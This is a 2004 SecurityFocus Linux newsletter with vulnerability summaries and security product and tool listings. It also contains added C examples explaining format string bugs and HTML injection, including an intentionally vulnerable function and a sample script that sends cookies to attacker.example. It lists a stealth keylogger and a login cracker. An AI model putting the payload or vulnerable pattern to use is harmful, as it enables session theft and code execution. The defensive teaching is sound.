Date: 9 Nov 2004 17:50:05 -0000
From: "Peter Laborge" <plaborge@securityfocus.com>
To: linux-secnews@securityfocus.com
Subject: SecurityFocus Linux Newsletter #209
SecurityFocus Linux Newsletter #209
------------------------------------

This Issue is Sponsored By: Symantec

Need to know what's happening on YOUR network? Symantec DeepSight Analyzer
is a free service that gives you the ability to track and manage attacks.
Analyzer automatically correlates attacks from various Firewall and network
based Intrusion Detection Systems, giving you a comprehensive view of your
computer or general network. Sign up today!

http://www.securityfocus.com/sponsor/Symantec_linux-secnews_041109

------------------------------------------------------------------------
I. FRONT AND CENTER
     1. The Cost of Security Training
     2. SSH User Identities
     3. Trends in Web Application Security
     4. Phishing For Savvy Users
II. LINUX VULNERABILITY SUMMARY
     1. Caudium Remote Denial Of Service Vulnerability
     2. Bogofilter EMail Filter Remote Quoted Printable Decoder Deni...
     3. Linux Kernel IPTables Initialization Failure Vulnerability
     4. QwikMail Remote Format String Vulnerability
     5. Cherokee HTTPD Auth_Pam Authentication Remote Format String ...
     6. PostgreSQL Unspecified RPM Initialization Script Vulnerabili...
     7. Proxytunnel Remote Format String Vulnerability
     8. Sun Java System Web And Application Servers Remote Denial Of...
     9. Gallery Unspecified Remote HTML Injection Vulnerability
III. LINUX FOCUS LIST SUMMARY
     1. Linux security compliance (Thread)
IV. NEW PRODUCTS FOR LINUX PLATFORMS
     1. Cyber-Ark  Inter-Business Vault
     2. EnCase Forensic Edition
     3. KeyGhost SX
     4. SafeKit
     5. Astaro Linux Firewall
     6. CAT Cellular Authentication Token and eAuthentication Servic...
V. NEW TOOLS FOR LINUX PLATFORMS
     1. Maillog View  v1.03.3
     2. BullDog Firewall 20040918
     3. PIKT - Problem Informant/Killer Tool v1.17.0
     4. ID-Synch 3.1
     5. Nmap v3.70
     6. THC-Hydra v4.3
VII. SPONSOR INFORMATION

I. FRONT AND CENTER
-------------------
1. The Cost of Security Training
By Don Parker

The cost of providing security training to your staff may be high, but what
is the cost of not providing any training at all?

http://www.securityfocus.com/columnists/275


2. SSH User Identities
By Brian Hatch

This article shows how to improve SSH security using public key
authentication instead of, or in addition to, password authentication.

http://www.securityfocus.com/infocus/1810


3. Trends in Web Application Security
By Kapil Raina

This article discusses current trends in penetration testing for web
application security, and in particular discusses a framework for selecting
the best tool or tools to use for this increasingly common type of
application.

http://www.securityfocus.com/infocus/1809


4. Phishing For Savvy Users
By Scott Granneman

Recent "phishing" episodes are still often overlooked by tech-savvy users,
but a lesson in history shows how entire nations have been fooled.

http://www.securityfocus.com/columnists/274

II. LINUX VULNERABILITY SUMMARY
-------------------------------
1. Caudium Remote Denial Of Service Vulnerability
BugTraq ID: 11567
Remote: Yes
Date Published: Oct 30 2004
Relevant URL: http://www.securityfocus.com/bid/11567
Summary:
Caudium is reported prone to a remote denial of service vulnerability.

Remote attackers may exploit this vulnerability to crash affected Web 
servers, denying service to legitimate users.

Versions of Caudium prior to 1.4.4 RC2 are reported susceptible to this 
vulnerability.

2. Bogofilter EMail Filter Remote Quoted Printable Decoder Deni...
BugTraq ID: 11568
Remote: Yes
Date Published: Nov 01 2004
Relevant URL: http://www.securityfocus.com/bid/11568
Summary:
A remote quoted printable decoder denial of service vulnerability 
reportedly affects Bogofilter.  This issue is due to a failure of the 
application to handle malformed email headers.

An attacker can leverage this issue to cause the affected email filter 
to crash, denying service to all legitimate users.

3. Linux Kernel IPTables Initialization Failure Vulnerability
BugTraq ID: 11570
Remote: No
Date Published: Nov 01 2004
Relevant URL: http://www.securityfocus.com/bid/11570
Summary:
The Linux kernel iptables firewall is reportedly affected by an 
initialization failure vulnerability.  The issue is attributed to a design 
error in how the rule set is loaded at startup.

When the failure occurs, not all of the firewall rules are loaded, yet the 
system appears to be protected, giving administrators a false sense of 
security.  Because the condition is silent, the active rule set should be 
verified after startup rather than inferred from the init script having run.

4. QwikMail Remote Format String Vulnerability
BugTraq ID: 11572
Remote: Yes
Date Published: Nov 01 2004
Relevant URL: http://www.securityfocus.com/bid/11572
Summary:
It is reported that QwikMail is susceptible to a remote format string 
vulnerability. This issue is due to a failure of the application to 
properly sanitize user-supplied input before using it as the format 
specifier in a formatted printing function.

This vulnerability reportedly allows remote attackers to execute 
arbitrary code in the context of the affected daemon process.

Version 0.3 was reported susceptible to this vulnerability. Other 
versions may also be affected.

5. Cherokee HTTPD Auth_Pam Authentication Remote Format String ...
BugTraq ID: 11574
Remote: Yes
Date Published: Nov 01 2004
Relevant URL: http://www.securityfocus.com/bid/11574
Summary:
It is reported that Cherokee is susceptible to a remote format string 
vulnerability. This issue is due to a failure of the application to 
properly sanitize user-supplied input before using it as the format 
specifier in a formatted printing function.

A remote attacker may exploit this vulnerability to execute arbitrary 
code in the context of the affected service.

6. PostgreSQL Unspecified RPM Initialization Script Vulnerabili...
BugTraq ID: 11575
Remote: Unknown
Date Published: Nov 01 2004
Relevant URL: http://www.securityfocus.com/bid/11575
Summary:
An unspecified RPM initialization script vulnerability affects 
PostgreSQL.  The underlying issue causing this vulnerability is currently 
unknown.

The impact of this issue is currently unknown.  This BID will be 
updated immediately upon the release of more information.

7. Proxytunnel Remote Format String Vulnerability
BugTraq ID: 11592
Remote: Yes
Date Published: Nov 03 2004
Relevant URL: http://www.securityfocus.com/bid/11592
Summary:
Proxytunnel is prone to a remotely exploitable format string 
vulnerability.  This vulnerability is exposed when the proxy server handles 
malicious input from another remote server.  This issue occurs when the 
software is run in daemon mode.  

Successful exploitation of this vulnerability may allow for execution 
of arbitrary code in the context of the proxy server.
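The three format string entries above (QwikMail, Cherokee and Proxytunnel) describe the same bug class: user-controlled text reaches a printf-family function as its format argument. The C snippet below is an added illustration of that class and its fix, written for this summary; it is hypothetical code, not taken from any of those projects, and it makes no assumption about where their actual bugs sit. The names `log_vulnerable`, `log_fixed`, `count_directives` and `output_equals` are chosen here.

```c
#include <stdio.h>
#include <string.h>

/*
 * Added illustration of the format string bug class and its fix.
 * Hypothetical code for this summary, not from QwikMail, Cherokee or
 * Proxytunnel; function names are chosen here.
 */

/* Vulnerable pattern: attacker-controlled text is passed as the *format*
 * argument, so any %x, %s or %n inside it is interpreted by the C library
 * (reading stack words, dereferencing pointers, or writing memory). Compilers
 * flag this shape with -Wformat-security; the pragma below silences that
 * warning only so the bug can be shown. Never call this with untrusted input. */
#pragma GCC diagnostic push
#pragma GCC diagnostic ignored "-Wformat-security"
#pragma GCC diagnostic ignored "-Wformat-nonliteral"
void log_vulnerable(char *out, size_t n, const char *user_input)
{
    snprintf(out, n, user_input);
}
#pragma GCC diagnostic pop

/* Fixed pattern: the format is a literal and the user text is an argument,
 * so it is copied, never interpreted. */
void log_fixed(char *out, size_t n, const char *user_input)
{
    snprintf(out, n, "%s", user_input);
}

/* Count the conversion directives the vulnerable path would honour. "%%" is
 * the literal percent sign and does not count. Handy as a triage check on
 * input that reaches a suspect printf-family call. */
int count_directives(const char *s)
{
    int count = 0;

    for (const char *p = s; *p; p++) {
        if (*p != '%')
            continue;
        if (p[1] == '%') {   /* escaped literal; skip the pair */
            p++;
            continue;
        }
        count++;
    }
    return count;
}

/* Helper: 1 if `fn` turns `in` into exactly `expect`. */
int output_equals(void (*fn)(char *, size_t, const char *),
                  const char *in, const char *expect)
{
    char buf[128];

    fn(buf, sizeof buf, in);
    return strcmp(buf, expect) == 0;
}

int main(void)
{
    /* Constructed sample: harmless, but enough to show that the vulnerable
     * path interprets the input ("%%" collapses to "%") while the fixed path
     * copies it verbatim. A real attack string would use %x, %s and %n. */
    const char *sample = "100%% done";
    char buf[128];

    log_vulnerable(buf, sizeof buf, sample);
    printf("vulnerable: %s\n", buf);
    log_fixed(buf, sizeof buf, sample);
    printf("fixed:      %s\n", buf);
    printf("directives in \"%%x%%x%%n\": %d\n", count_directives("%x%x%n"));
    return 0;
}
```

gcc and clang emit a -Wformat-security warning for exactly the `log_vulnerable` shape (some distributions enable it by default), which is why the block has to suppress it; turning that warning into an error across a code base is the cheapest audit for this class. The fix is always the same: make the format a literal and pass the user text as an argument.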

8. Sun Java System Web And Application Servers Remote Denial Of...
BugTraq ID: 11593
Remote: Yes
Date Published: Nov 03 2004
Relevant URL: http://www.securityfocus.com/bid/11593
Summary:
A remote denial of service vulnerability affects the Sun Java Web 
Server and the Sun Java Application Server.  This issue is due to a failure 
of the server applications to process malformed data.

An attacker may exploit this issue to cause the affected server to 
crash, denying service to legitimate users.

9. Gallery Unspecified Remote HTML Injection Vulnerability
BugTraq ID: 11602
Remote: Yes
Date Published: Nov 03 2004
Relevant URL: http://www.securityfocus.com/bid/11602
Summary:
An unspecified HTML injection vulnerability reportedly affects Gallery.  
This issue is due to a failure of the application to properly sanitize 
user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in 
the browser of an unsuspecting user.  This may facilitate the theft of 
cookie-based authentication credentials as well as other attacks.
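The Gallery entry describes a generic HTML injection: text supplied by one user is rendered unescaped into a page viewed by another, so a `<script>` tag in that text runs in the viewer's browser with access to the page's cookies. The C snippet below is an added illustration of the render step with and without output encoding, written for this summary; it is hypothetical code, not Gallery's (Gallery is a PHP application), and the names `html_escape`, `render_vulnerable`, `render_fixed` and `render_equals` are chosen here. It encodes for the HTML body context only; attribute, URL and JavaScript contexts need their own encoders.

```c
#include <stdio.h>
#include <string.h>

/*
 * Added illustration of HTML injection and its fix (output encoding).
 * Hypothetical code for this summary, not Gallery's; names are chosen here.
 */

/* Encode the five characters that can change HTML context. Returns the number
 * of bytes written (excluding the terminating NUL), or -1 if `out` is too
 * small, in which case `out` is left as an empty string rather than a
 * truncated, possibly half-encoded, fragment. */
int html_escape(const char *in, char *out, size_t out_size)
{
    size_t used = 0;

    if (out_size == 0)
        return -1;
    for (const char *p = in; *p; p++) {
        char one[2] = { *p, '\0' };
        const char *rep;

        switch (*p) {
        case '&':  rep = "&amp;";  break;
        case '<':  rep = "&lt;";   break;
        case '>':  rep = "&gt;";   break;
        case '"':  rep = "&quot;"; break;
        case '\'': rep = "&#x27;"; break;
        default:   rep = one;      break;
        }
        size_t len = strlen(rep);
        if (used + len + 1 > out_size) {   /* +1 keeps room for the NUL */
            out[0] = '\0';
            return -1;
        }
        memcpy(out + used, rep, len);
        used += len;
    }
    out[used] = '\0';
    return (int)used;
}

/* Vulnerable render: the user's comment is dropped straight into the markup,
 * so "<script>...</script>" in the comment becomes live script for every
 * viewer of the page. */
int render_vulnerable(char *out, size_t n, const char *comment)
{
    int r = snprintf(out, n, "<p>%s</p>", comment);
    return (r < 0 || (size_t)r >= n) ? -1 : r;
}

/* Fixed render: encode at output time, then place the result in the template.
 * The browser now shows the tag as text instead of executing it. */
int render_fixed(char *out, size_t n, const char *comment)
{
    char esc[512];
    int r;

    if (html_escape(comment, esc, sizeof esc) < 0)
        return -1;
    r = snprintf(out, n, "<p>%s</p>", esc);
    return (r < 0 || (size_t)r >= n) ? -1 : r;
}

/* Helper: 1 if `render` turns `comment` into exactly `expect`. */
int render_equals(int (*render)(char *, size_t, const char *),
                  const char *comment, const char *expect)
{
    char buf[1024];

    if (render(buf, sizeof buf, comment) < 0)
        return 0;
    return strcmp(buf, expect) == 0;
}

int main(void)
{
    /* Constructed sample payload: sends the viewer's cookies to a third party. */
    const char *payload =
        "<script>new Image().src='http://attacker.example/?c='+document.cookie</script>";
    char page[1024];

    render_vulnerable(page, sizeof page, payload);
    printf("vulnerable: %s\n", page);
    render_fixed(page, sizeof page, payload);
    printf("fixed:      %s\n", page);
    return 0;
}
```

The fix lives in the output path, not in input filtering: stripping "dangerous" tags from submitted text is easy to bypass, while encoding every untrusted value at the point it is placed into markup makes the injection inert regardless of what was submitted.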

III. LINUX FOCUS LIST SUMMARY
-----------------------------
1. Linux security compliance (Thread)
Relevant URL:

http://www.securityfocus.com/archive/91/380267

IV. NEW PRODUCTS FOR LINUX PLATFORMS
------------------------------------
1. Cyber-Ark  Inter-Business Vault
By: Cyber-Ark
Platforms: Linux, Windows 2000, Windows NT, Windows XP
Relevant URL: 
http://www.cyber-ark.com/datasecuritysoftware/inter-business_vault.htm
Summary: 

Based on Cyber-Ark Software's Vaulting Technology, the Inter-Business 
Vault is an information security solution that enables organizations to 
safely overcome traditional network boundaries in order to securely share 
business information among customers, business partners, and remote 
branches. It provides a seamless, LAN-like experience over the Internet 
that includes the security, performance, accessibility, and ease of 
administration required to allow organizations to share everyday 
information worldwide. More information on these core attributes of the 
Inter-Business Vault is available at the URL above.

2. EnCase Forensic Edition
By: Guidance Software Inc.
Platforms: DOS, FreeBSD, Linux, MacOS, NetBSD, OpenBSD, PalmOS, 
Solaris, UNIX, Windows 2000, Windows 95/98, Windows NT, Windows XP
Relevant URL: 
http://www.guidancesoftware.com/products/EnCaseForensic/index.shtm
Summary: 

EnCase Forensic Edition Version 4 delivers the most advanced features 
for computer forensics and investigations. With an intuitive GUI and 
superior performance, EnCase Version 4 provides investigators with the 
tools to conduct large-scale and complex investigations with accuracy and 
efficiency. Guidance Software's award winning solution yields 
completely non-invasive computer forensic investigations while allowing 
examiners to easily manage large volumes of computer evidence and view all 
relevant files, including "deleted" files, file slack and unallocated 
space. 

The integrated functionality of EnCase allows the examiner to perform 
all functions of the computer forensic investigation process. EnCase's 
EnScript, a powerful macro-programming language and API included within 
EnCase, allows investigators to build customized and reusable forensic 
scripts.

3. KeyGhost SX
By: KeyGhost Ltd
Platforms: BeOS, DOS, Linux, OS/2, Solaris, SunOS, Windows 2000, 
Windows 95/98, Windows NT, Windows XP
Relevant URL: http://www.keyghost.com/SX/
Summary: 

KeyGhost SX discreetly captures and records all keystrokes typed, 
including chat conversations, email, word processor, or even activity within 
an accounting or specialist system. It is completely undetectable by 
software scanners and provides you with one of the most powerful stealth 
surveillance applications offered anywhere. 

Because KeyGhost uses strong 128-bit encryption to store the recorded 
data in its own internal memory (not on the hard drive), it is 
impossible for a network intruder to gain access to any sensitive data stored 
within the device.

4. SafeKit
By: Evidian Inc.
Platforms: AIX, HP-UX, Linux, Solaris, Windows 2000
Relevant URL: http://www.evidian.com/safekit/index.htm
Summary: 

Evidian's SafeKit technology makes it possible to render any 
application available 24 hours per day. With no extra hardware: just use your 
existing servers and install this software-only solution.

This provides ultimate scalability. As your needs grow, all you need to 
do is add more standard servers into the cluster. With the load 
balancing features of SafeKit, you can distribute applications over multiple 
servers. If one system fails completely, the others will continue to 
serve your users.

5. Astaro Linux Firewall
By: Astaro
Platforms: Linux
Relevant URL: http://www.astaro.com/php/statics.php?action=asl&lang=gb
Summary: 

Astaro Linux Firewall: All-in-one firewall, virus protection, content 
filtering and spam protection internet security software package for 
Linux. 
Free download for home users.

6. CAT Cellular Authentication Token and eAuthentication Servic...
By: Mega AS Consulting Ltd
Platforms: Java, Linux, OpenBSD, Os Independent, SecureBSD, Solaris, 
UNIX, Windows 2000, Windows NT
Relevant URL: http://www.megaas.co.nz
Summary: 

Low cost, easy to use two-factor authentication one-time-password token 
that runs on a cellular phone. It does not use SMS or any other 
communication channel and manages multiple OTP accounts. For any business 
that wants safer access to its Internet services. More information at our 
site.

We also provide an eAuthentication service for businesses that will not 
buy an authentication product but would prefer to pay a monthly charge 
for authentication services from our CAT Server.

V. NEW TOOLS FOR LINUX PLATFORMS
--------------------------------
1. Maillog View  v1.03.3
By: Angelo 'Archie' Amoruso
Relevant URL: http://www.netorbit.it/modules.html
Platforms: Linux
Summary: 

Maillog View is a Webmin module that allows you to easily view all your 
/var/log/maillog.* files. It features autorefresh, message size 
indication, ascending/descending view order, compressed file support, and a 
full statistics page. Sendmail, Postfix, Exim, and Qmail (partially) are 
supported. Courier MTA support is experimental.

2. BullDog Firewall 20040918
By: Robert APM Darin
Relevant URL: http://tanaya.net/BullDog
Platforms: Linux
Summary: 

BullDog is a powerful but lightweight firewall for heavily used systems. 
With many features, this firewall can be used by anyone who wants to 
protect his/her systems.

The system allows dynamic and static rule sets for maximum protection 
and has several advanced features.

This firewall will work for a hobbyist or a military base. Generation 
7 is a complete rewrite and redesign from scratch.

Be prepared to spend some time setting this up.

3. PIKT - Problem Informant/Killer Tool v1.17.0
By: Robert Osterlund, robert.osterlund@gsb.uchicago.edu
Relevant URL: http://pikt.org
Platforms: AIX, FreeBSD, HP-UX, IRIX, Linux, Solaris, SunOS
Summary: 

PIKT is a cross-categorical, multi-purpose toolkit to monitor and 
configure computer systems, organize system security, format documents, 
assist command-line work, and perform other common systems administration 
tasks.

PIKT's primary purpose is to report and fix problems, but its 
flexibility and extensibility evoke many other uses limited only by your 
imagination.

4. ID-Synch 3.1
By: M-Tech Information Technology, Inc.
Relevant URL: http://idsynch.com/
Platforms: AIX, AS/400, DG-UX, Digital UNIX/Alpha, HP-UX, IRIX, Linux, 
MacOS, MPE/iX, Netware, OpenBSD, OpenVMS, OS/2, OS/390, RACF, Solaris, 
SunOS, True64 UNIX, Ultrix, VM, VMS, VSE, Windows 2000, Windows NT
Summary: 

ID-Synch is enterprise user provisioning software. It reduces the cost 
of user administration, helps new and reassigned users get to work more 
quickly, and ensures prompt and reliable access termination. This is 
accomplished through automatic propagation of changes to user profiles 
from systems of record to managed systems, with self service workflow for 
security change requests, through consolidated and delegated user 
administration, and with federation.

5. Nmap v3.70
By: Fyodor
Relevant URL: http://www.insecure.org/nmap/
Platforms: AIX, BSDI, FreeBSD, HP-UX, IRIX, Linux, NetBSD, OpenBSD, 
Solaris, SunOS, UNIX
Summary: 

Nmap is a utility for port scanning large networks, although it works 
fine for single hosts. Sometimes you need speed, other times you may 
need stealth. In some cases, bypassing firewalls may be required. Not to 
mention the fact that you may want to scan different protocols (UDP, 
TCP, ICMP, etc.). Nmap supports Vanilla TCP connect() scanning, TCP SYN 
(half open) scanning, TCP FIN, Xmas, or NULL (stealth) scanning, TCP ftp 
proxy (bounce attack) scanning, SYN/FIN scanning using IP frag

6. THC-Hydra v4.3
By: THC
Relevant URL: http://www.thc.org/releases/hydra-4.3-src.tar.gz
Platforms: AIX, FreeBSD, HP-UX, IRIX, Linux, NetBSD, OpenBSD, Solaris, 
UNIX
Summary: 

THC-Hydra, a parallelized login hacker, is available for Samba, FTP, POP3, 
IMAP, Telnet, HTTP Auth, LDAP, NNTP, MySQL, VNC, ICQ, Socks5, PCNFS, 
Cisco and more. It includes SSL support and is part of Nessus. Visit the 
project web site to download Win32, Palm and ARM binaries. Changes: 
important bugfix!

VII. SPONSOR INFORMATION
-----------------------

This Issue is Sponsored By: Symantec

Need to know what's happening on YOUR network? Symantec DeepSight Analyzer
is a free service that gives you the ability to track and manage attacks.
Analyzer automatically correlates attacks from various Firewall and network
based Intrusion Detection Systems, giving you a comprehensive view of your
computer or general network. Sign up today!

http://www.securityfocus.com/sponsor/Symantec_linux-secnews_041109